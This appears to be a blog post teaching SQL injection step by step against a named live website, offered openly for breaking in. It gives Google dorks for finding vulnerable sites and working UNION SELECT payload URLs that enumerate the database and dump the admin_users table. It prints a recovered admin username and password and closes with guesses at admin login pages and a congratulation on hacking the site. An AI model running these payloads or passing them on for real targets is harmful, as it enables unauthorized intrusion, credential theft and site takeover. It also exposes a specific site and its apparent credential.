In this Attack we hack database of Website and through which we can steal credentials and login to website using those credentials. if a site has an admin panel, then you can login to that admin panel and can get hold on whole Website.
Step 1: Find Vulnerable Websites : Then ..
1.) Go to www.google.com and type :
a.)inurl: php?id=.
b.)inurl: asp?id=
This Google Dork is used to find websites which uses GET Method and hence may be vulnerable.
2.) After Finding the Website's vulnerable link, Suppose Website link is this :
http://www.schoolarcade.com.pk/book_detail.php?id=309, Then Try
http://www.schoolarcade.com.pk/book_detail.php?id=309'
Now if you got any sql error like :
mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/schoolar/public_html/book_detail.php on line 8
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax
Then it Proves that site is Sqli Vulnerable. Now lets move to step 2.
Step 2: Find No of columns in table
1.) type order by 1-- at end of URL so that final URL became :http://www.schoolarcade.com.pk/book_detail.php?id=309 order by 1--
If u don't get error then try, order by 2-- and so on until u got the error. Suppose u got the error at order by 13--
It means there are total of 12 columns in table.
Step 3: Find Vulnerable Columns
1.) now at the end of url type: union select all 1,2,3,4,5,6,7,8,9,10,11,12 from information_schema.tables where table_schema=database(), ad replace id=309 with id=-309 so final url would become:
http://www.schoolarcade.com.pk/book_detail.php?id=-309 union select all 1,2,3,4,5,6,7,8,9,10,11,12 from information_schema.tables where table_schema=database()
Now you can see some numbers on screens as shown in image which shows column numbers which are vulnerable. In image we can see that column no 1,3,5,6,7,8 are vulnerable we will use column 7 and 8 in forgoing steps.
Here we write upto 12 because total no of column we find in previous step are 12. information_schema is a database which keep information of every column, table and constraint of database.
Step 4 : Finding Database version
1.) try this url : http://www.schoolarcade.com.pk/book_detail.php?id=-309 union select all 1,2,3,4,5,6,version(),8,9,10,11,12 from information_schema.tables where table_schema=database()
Here we replaced vulnerable column 7 with the "version()" a function used to display database version.
If it displays version greater than 5 as shown in image below, then you can go ahead otherwise leave this site and find another one.
Step 5 :Finding Table names
1.) Try this url : http://www.schoolarcade.com.pk/book_detail.php?id=-309 union select all 1,2,3,4,5,6,7,group_concat(table_name),9,10,11,12 from information_schema.tables where table_schema=database()
Here we replaced vulnerable column 8 with the "group_concat(table_name)". table_name column of information_schema.tables contain Table names of whole database.
Now you can see in image below it lists all the tables of current database. Here i Found an interesting table admin_users which lists username and passwords of site Administrators.
Step 6: Finding Columns names
1.) Try this url : http://www.schoolarcade.com.pk/book_detail.php?id=-309 union select all 1,2,3,4,5,6,7,group_concat(column_name),9,10,11,12 from information_schema.columns where table_schema=database()
Here we have replaces vulnerable column 8 with "group_concat(column_name)" and also replaced "information_schema.tables" with "information_schema.columns"
Now it will list all columns as shown in image below and we have to find columns related to admin_users table.
Columns corresponding to username and password are : user_id and user_pass. Now we have Table and Column Names. Now we just have to retrieve the data from table.
Step 8 : To retrieve the username and password, Replace vulnerable column 8 with"group_concat(user_id,0x3a,user_pass)", here user_id and user_pass are columns names and ox3a is Hex equivalent of ":" just used to separate username and password.
Replace string with "from information_schema ...." with "from admin_users" where admin_users is table_name.
Now you can view username and password as "admin:P$apIll.11"
And Now you have site administrator's username and password also. you just have to find the login page of Admin
Step 9 : Finding Admin Page :
1.) You can guess that or can try few common admin page like
a.) www.site.com/admin/
b.) www.site.com/administrators
c.) www.site.com/login.php
After finding the Login Page, login using the above found username and password...
Congrats!!!You have hacked the Website....
No comments:
Post a Comment